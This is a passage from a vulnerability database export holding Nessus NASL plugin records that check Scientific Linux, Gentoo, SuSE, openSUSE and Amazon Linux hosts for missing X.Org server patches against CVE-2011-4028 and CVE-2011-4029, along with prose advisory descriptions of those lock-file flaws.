value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xnest-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xorg-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-common-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-devel-1.10.6-1.sl6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"xorg-x11-server-source-1.10.6-1.sl6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:52:52", "description": "The remote host is affected by the vulnerability described in GLSA-201110-19\n(X.Org X Server: Multiple vulnerabilities)\n\n vladz reported the following vulnerabilities in the X.Org X server:\n The X.Org X server follows symbolic links when trying to access the\n lock file for a X display, showing a predictable behavior depending on\n the file type of the link target (CVE-2011-4028).\n The X.Org X server lock file mechanism allows for a race condition to\n cause the X server to modify the file permissions of an arbitrary file\n to 0444 (CVE-2011-4029).\n \nImpact :\n\n A local attacker could exploit these vulnerabilities to disclose\n information by making arbitrary files on a system world-readable or gain\n information whether a specified file exists on the system and whether it\n is a file, directory, or a named pipe.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2011-10-24T00:00:00", "title": "GLSA-201110-19 : X.Org X Server: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2011-10-24T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:xorg-server"], "id": "GENTOO_GLSA-201110-19.NASL", "href": "https://www.tenable.com/plugins/nessus/56594", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201110-19.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56594);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_xref(name:\"GLSA\", value:\"201110-19\");\n\n script_name(english:\"GLSA-201110-19 : X.Org X Server: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201110-19\n(X.Org X Server: Multiple vulnerabilities)\n\n vladz reported the following vulnerabilities in the X.Org X server:\n The X.Org X server follows symbolic links when trying to access the\n lock file for a X display, showing a predictable behavior depending on\n the file type of the link target (CVE-2011-4028).\n The X.Org X server lock file mechanism allows for a race condition to\n cause the X server to modify the file permissions of an arbitrary file\n to 0444 (CVE-2011-4029).\n \nImpact :\n\n A local attacker could exploit these vulnerabilities to disclose\n information by making arbitrary files on a system world-readable or gain\n information whether a specified file exists on the system and whether it\n is a file, directory, or a named pipe.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201110-19\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All X.Org X Server 1.9 users should upgrade to the latest 1.9 version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.9.5-r1'\n All X.Org X Server 1.10 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.10.4-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xorg-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"x11-base/xorg-server\", unaffected:make_list(\"rge 1.9.5-r1\", \"ge 1.10.4-r1\"), vulnerable:make_list(\"lt 1.10.4-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"X.Org X Server\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T14:42:02", "description": "This update fixes two security issues with the X server :\n\n - A local attacker could find out if a file exists by\n exploiting the way that Xorg creates its lock files.\n (CVE-2011-4028)\n\n - A non-root local user could set the read permission for\n all users on any file or directory. (CVE-2011-4029)", "edition": 23, "published": "2011-12-13T00:00:00", "title": "SuSE 11.1 Security Update : xorg-x11-server (SAT Patch Number 5479)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2011-12-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:xorg-x11-server-extra", "p-cpe:/a:novell:suse_linux:11:xorg-x11-server", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:xorg-x11-Xvnc"], "id": "SUSE_11_XORG-X11-XVNC-111124.NASL", "href": "https://www.tenable.com/plugins/nessus/57138", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57138);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"SuSE 11.1 Security Update : xorg-x11-server (SAT Patch Number 5479)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes two security issues with the X server :\n\n - A local attacker could find out if a file exists by\n exploiting the way that Xorg creates its lock files.\n (CVE-2011-4028)\n\n - A non-root local user could set the read permission for\n all users on any file or directory. (CVE-2011-4029)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4029.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5479.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xorg-x11-Xvnc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xorg-x11-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xorg-x11-server-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xorg-x11-Xvnc-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xorg-x11-server-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xorg-x11-server-extra-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xorg-x11-Xvnc-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xorg-x11-server-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xorg-x11-server-extra-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"xorg-x11-Xvnc-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"xorg-x11-server-7.4-27.40.52.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"xorg-x11-server-extra-7.4-27.40.52.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T14:08:21", "description": "The X server had two security issues and one bug that is fixed by this\nupdate.\n\nCVE-2011-4028: It is possible for a local attacker to deduce if a file\nexists or not by exploiting the way that Xorg creates its lock files.\n\nCVE-2011-4029: It is possible for a non-root local user to set the\nread permission for all users on any file or directory.", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xorg-x11-Xvnc (openSUSE-SU-2012:0227-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xorg-x11-server", "p-cpe:/a:novell:opensuse:xorg-x11-server-sdk", "p-cpe:/a:novell:opensuse:xorg-x11-server-extra", "p-cpe:/a:novell:opensuse:xorg-x11-Xvnc", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_XORG-X11-XVNC-111201.NASL", "href": "https://www.tenable.com/plugins/nessus/75780", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update xorg-x11-Xvnc-5490.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75780);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"openSUSE Security Update : xorg-x11-Xvnc (openSUSE-SU-2012:0227-1)\");\n script_summary(english:\"Check for the xorg-x11-Xvnc-5490 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The X server had two security issues and one bug that is fixed by this\nupdate.\n\nCVE-2011-4028: It is possible for a local attacker to deduce if a file\nexists or not by exploiting the way that Xorg creates its lock files.\n\nCVE-2011-4029: It is possible for a non-root local user to set the\nread permission for all users on any file or directory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00028.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xorg-x11-Xvnc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-Xvnc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xorg-x11-server-sdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"xorg-x11-Xvnc-7.5_1.8.0-10.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"xorg-x11-server-7.5_1.8.0-10.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"xorg-x11-server-extra-7.5_1.8.0-10.15.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"xorg-x11-server-sdk-7.5_1.8.0-10.15.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-01T01:19:53", "description": "A flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)", "edition": 24, "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : xorg-x11-server (ALAS-2012-104)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:xorg-x11-server-source", "p-cpe:/a:amazon:linux:xorg-x11-server-common", "p-cpe:/a:amazon:linux:xorg-x11-server-Xvfb", "p-cpe:/a:amazon:linux:xorg-x11-server-Xnest", "p-cpe:/a:amazon:linux:xorg-x11-server-debuginfo", "p-cpe:/a:amazon:linux:xorg-x11-server-Xephyr", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-104.NASL", "href": "https://www.tenable.com/plugins/nessus/69594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-104.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69594);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_xref(name:\"ALAS\", value:\"2012-104\");\n script_xref(name:\"RHSA\", value:\"2012:0939\");\n\n script_name(english:\"Amazon Linux AMI : xorg-x11-server (ALAS-2012-104)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-104.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update xorg-x11-server' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-Xnest-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-common-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.12.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"xorg-x11-server-source-1.10.6-1.12.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xephyr / xorg-x11-server-Xnest / etc\");\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-20T14:42:03", "description": "This update of xorg-x11-server-rdp fixed the following security \nissues :\n\n - memory exhaustion flaw CVE-2011-4028 / CVE-2011-4029 -\n race condition flaw. (CVE-2010-2240)", "edition": 17, "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 / 11.2 Security Update : xorg-x11-server-rdp (SAT Patch Numbers 6111 / 6113)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029", "CVE-2010-2240"], "modified": "2013-01-25T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:xorg-x11-server-rdp"], "id": "SUSE_11_XORG-X11-SERVER-RDP-120410.NASL", "href": "https://www.tenable.com/plugins/nessus/64240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64240);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2010-2240\", \"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"SuSE 11.1 / 11.2 Security Update : xorg-x11-server-rdp (SAT Patch Numbers 6111 / 6113)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of xorg-x11-server-rdp fixed the following security \nissues :\n\n - memory exhaustion flaw CVE-2011-4028 / CVE-2011-4029 -\n race condition flaw. (CVE-2010-2240)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=497578\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=746949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4028.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4029.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 6111 / 6113 as appropriate.\"\n );\n 